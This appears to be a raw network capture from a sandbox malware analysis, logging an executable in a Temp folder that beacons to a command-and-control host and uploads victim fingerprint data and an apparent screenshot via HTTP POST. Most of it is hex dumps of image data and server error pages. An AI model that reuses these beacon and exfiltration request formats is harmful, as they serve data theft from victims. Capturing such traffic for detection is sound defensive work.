                          Nov 12, 2021 22:23:18.338393927 CET2315OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:18.338515997 CET2318OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:18.360738039 CET2321OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:18.360805035 CET2326OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:18.360861063 CET2331OUTData Raw: 4a 00 43 4c 27 34 e2 73 4d a4 c6 86 56 cf 86 7f e4 25 27 fd 71 3f cc 56 2d 6d 78 67 fe 42 52 7f d7 13 fc c5 6b 85 fe 34 4c b1 7f c1 91 d5 d6 ff 00 87 3c 21 a9 f8 96 4d d6 c8 23 b6 53 87 b8 93 ee 83 e8 3d 4d 65 e9 96 2f a9 ea 96 d6 48 42 99 a4 09
                          Data Ascii: JCL'4sMV%'q?V-mxgBRk4L<!M#S=Me/HBQ=uG1PimFU'j^7:Q=pXxUwek->uBHwh-$c>*%K+ l=1^Khh.Fz5Zu$(bi
                          Nov 12, 2021 22:23:18.360874891 CET2334OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:18.360915899 CET2338OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
                          Nov 12, 2021 22:23:18.360949039 CET2343OUTData Raw: e4 77 a7 cd 17 ba 17 2c 96 cc b2 74 b8 4f 47 a6 9d 20 ff 00 0b d3 04 cc 3b d3 d6 e1 c7 43 4e d4 df 41 5e aa ea 44 74 a9 87 4c 1a 89 b4 fb 85 3f 70 d5 f1 76 e3 bd 4a 97 8d de 8f 67 49 ec 1e d6 aa 32 4d ac c3 f8 0f e5 4d 31 38 ea a6 b7 85 da 9e ab
                          Data Ascii: w,tOG ;CNA^DtL?pvJgI2MM18NobvZ?-4Z?A_V}}j=Qvm*[?%')biHm&QQ:u)}JXV>~T)F1Shaq8p+IpH%:S AO
                          Nov 12, 2021 22:23:18.383275032 CET2352OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:18.431119919 CET2414INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:18 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          160192.168.2.449945178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:52.669173002 CET7702OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:52.697014093 CET7703INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:52 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          161192.168.2.449946178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:52.774061918 CET7703OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:52.774396896 CET7703OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:52.774677992 CET7713OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:52.774816990 CET7716OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:52.797285080 CET7718INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:52 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:23:52.797426939 CET7731OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:52.797475100 CET7736OUTData Raw: 55 6d 3a 39 6d 6d 34 c3 76 3c 3b 2c e8 f7 b1 c1 e5 f9 a2 f8 a6 f6 33 7c 99 db f2 e5 bb 71 5c 6d dd e5 c5 fd c9 b8 b9 31 6f 20 28 58 a1 48 91 40 ec 11 00 55 1f 41 4f 1a 96 a2 b6 e6 d9 6e b1 01 b5 36 65 3c b5 ff 00 52 64 f3 4a e7 19 fb fc e7 af 6c
                          Data Ascii: Um:9mm4v<;,3|q\m1o (XH@UAOn6e<RdJl$heJZ.'<-'aU[*S,07EWu.~PskKm\y$/4I(6%f\tw7Vr[bi#@xl z-$Ke8K.#$dT
                          Nov 12, 2021 22:23:52.802393913 CET7740OUTData Raw: 06 8d be fa 03 52 e6 d0 29 eb a9 9d b6 8d 80 f6 ad 51 69 6f 2f dc 62 b4 36 95 2f 54 65 6a 9f 6d 1e a6 8a 32 7a a3 24 c0 08 a8 5e d3 22 b5 9a ce 68 fe fc 4d 51 f9 5e d5 4a a4 58 b9 e5 1d cc 29 6c fd ab 3e 7b 2f 6a eb 0d be e1 d2 a0 92 c7 23 ee 9a
                          Data Ascii: R)Qio/b6/Tejm2z$^"hMQ^JX)l>{/j#OFMLIMJtb]i8j:1Tek@,W$DfCt3 ?s)WEpAIo3o)kKXdPt-^6B=yyFxkfy
                          Nov 12, 2021 22:23:52.820239067 CET7756OUTData Raw: 8c 52 f9 c3 f8 51 45 17 64 ba 9e 45 41 1c a7 a2 13 f8 54 8b 6f 31 fe 1c 7d 6a 73 33 f6 c0 a6 99 1f fb c6 8d 49 e7 6c 05 ab 77 75 1f 8d 3c 5b a0 eb 27 e5 51 ee 3e b4 80 d3 b3 25 dd 96 36 40 a7 ef 13 4e df 0a f4 50 6a b6 68 a3 90 9b 16 85 d0 1f 75
                          Data Ascii: RQEdEATo1}js3Ilwu<['Q>%6@NPjhuU\^#,{~`4#7V'QG${*5<_[W/V.>Cd;1^!gGF=nl5}NPF;m)hV(\$|.<oZO7Z$dW
                          Nov 12, 2021 22:23:52.820295095 CET7772OUTData Raw: d1 0a 29 c2 80 28 02 a0 d1 21 45 2e 38 a0 0a 5c 71 48 a1 cb 52 2d 30 0c 53 85 4b 2d 12 0a 95 7a 54 42 a4 02 b3 66 d1 24 a5 c7 14 d1 4e 15 0c b1 40 af 29 f8 a7 f7 ad 3d dd cf f2 af 57 1d 6b ca 3e 2a 63 cc b2 fa bf f4 ad 68 7c 44 55 e8 78 ae 68 cf
                          Data Ascii: )(!E.8\qHR-0SK-zTBf$N@)=Wk>*ch|DUxh+M@<Gy%jng#3u\ ua[Of.<^5dUWVGQS[vPo+43=4ohdy6||MbzC\CW?9+
                          Nov 12, 2021 22:23:52.821037054 CET7777OUTData Raw: 23 55 39 3d c7 8e b4 f1 c1 a6 03 c5 2e 6a 6c 5a 64 81 b9 a7 a9 cd 43 de a4 5a 96 8d 22 c9 29 c3 a5 34 52 d4 b3 64 c9 01 c0 a7 83 51 03 4f 0c 2a 19 69 92 66 9c 2a 2d d4 a1 8d 4b 46 89 93 8a 5c d4 60 9a 77 6e 4e 2a 5a 34 4c 90 1c 53 81 15 01 92 25
                          Data Ascii: #U9=.jlZdCZ")4RdQO*if*-KF\`wnN*Z4LS%(iZEP~#{!Ht}+<v?io\_@BQo[uf% XkWEWkVK1iS<z%[W099 w'x`|>svO<c8<?Q}[Ya
                          Nov 12, 2021 22:23:52.827069998 CET7783OUTData Raw: d4 a1 a8 e6 1f 21 29 6a 4d d5 16 ea 03 52 e6 1f 29 30 6a 5c d4 21 a9 db a9 dc 5c a4 a0 d3 b3 50 86 a5 0d 4e e4 f2 92 83 4b 9a 8c 1a 5c d3 15 87 e6 8c d3 01 a5 cd 02 b0 ea 50 69 99 cd 00 d0 16 24 a3 34 cc d1 9c 77 a7 71 58 92 97 35 16 f1 47 99 e9
                          Data Ascii: !)jMR)0j\!\PNK\Pi$4wqX5G@rf5.R}oM-OQ4fr44nN&`xb>:jwccTFj\bjbyl7sPmc@-T "msx-8Ya>AHMsGNT


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          162192.168.2.449947178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:52.843247890 CET7788OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:52.868051052 CET7790INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:52 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          163192.168.2.449948178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:53.004031897 CET7791OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:53.029639006 CET7792INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:53 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          164192.168.2.449949178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:53.167527914 CET7792OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:53.190277100 CET7794INHTTP/1.1 503 Service Temporarily Unavailable
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:53 GMT
                          Content-Type: text/html
                          Content-Length: 1230
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          ETag: "5a4b7cd2-4ce"
                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 20 2d 20 d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 31 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 35 35 33 36 66 63 39 33 34 33 65 39 61 62 30 61 63 61 30 37 31 33 35 34 30 38 34 64 64 33 63 63 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 63 65 6e 74 65 72 3e 0a 3c 48 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 62 72 3e d1 eb f3 e6 e1 e0 20 e2 f0 e5 ec e5 ed ed ee 20 ed e5 e4 ee f1 f2 f3 ef ed e0 3c 2f 48 31 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 